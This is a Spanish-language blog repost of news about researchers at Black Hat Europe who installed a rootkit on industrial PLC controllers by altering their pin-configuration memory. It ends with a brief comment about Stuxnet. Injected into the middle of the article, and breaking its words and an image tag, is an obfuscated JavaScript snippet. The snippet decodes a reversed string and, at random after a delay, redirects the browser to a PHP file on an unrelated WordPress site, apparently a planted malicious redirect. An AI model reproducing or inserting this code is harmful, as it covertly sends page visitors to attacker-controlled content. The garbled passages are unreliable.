Investigadores logran instalar un rootkit en los componentes PLC de control industrial
Dos investigadores de seguridad presentaron en la pasada conferencia de seguridad informática Black Hat Europe una investigación ataques realizados a equipos industriales.
Concretamente mostraron que eran capaces de instalar un rootkit en los componentes PLC (Controlador Lógico Programable) que normalmente se utilizan en los sistemas industriales para controlar maquinarias y sensores.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tokesypokes.com/wp-content/uploads/2016/11/plc-investigacion-ataque.jpg” alt=”” width=”700″ height=”394″ /><br />
Los PLC se basan en sistemas operativos muy simples que gestionan señales de entrada y salida a través de conexiones o pines, algo que también se conoce como una interfaz I/O. El mé<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todo utilizado por los investigadores consistía en modificar la memoria dinámica del PLC, una lista donde el dispositivo almacena la configuración de los diferentes pines.
Al alterar estos datos de configuración en el PLC, un atacante podría tomar el control y así falsificar la información que se recibe de los sensores o tomar acciones más graves como apagar o encender componentes industriales sin que los operadores lo sepan.
Para lograr esta modificación en el software del dispositivo un atacante debería de ejecutar su código por medio de una vulnerabilidad en el firmware del PLC, logrando privilegios de root el código podría instalarse de tal forma que no se borraría aunque el dispositivo se reinicie.
En la conferencia los investigadores comentaron además que realizar este tipo de ataques es complicado, pero con el tiempo y los recursos necesarios serían posibles. Un gobierno, por ejemplo, podría patrocinar este tipo de prácticas o una compañía que busque perjudicar a su competencia. Situaciones así ya han sucedido antes y un ejemplo claro de ello es el caso Stuxnet.
Los nombres de los proveedores o fabricantes de los dispositivos PLC vulnerables al ataque no se dieron a conocer, ya que el objetivo de este tipo de conferencias es generar conciencia sobre los distintos vectores de ataque para que sean mitigados en el futuro.
Ver información original al respecto en Fuente:
http://tokesypokes.com/noticias/investigadores-logran-instalar-un-rootkit-en-los-componentes-plc-de-control-industrial/
COMENTARIO: Muy complejo parece cuando, con un pendrive, ya hace mas de 6 años, se instalaba el STUXNET : https://es.wikipedia.org/wiki/Stuxnet
saludos
ms, 14-11-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.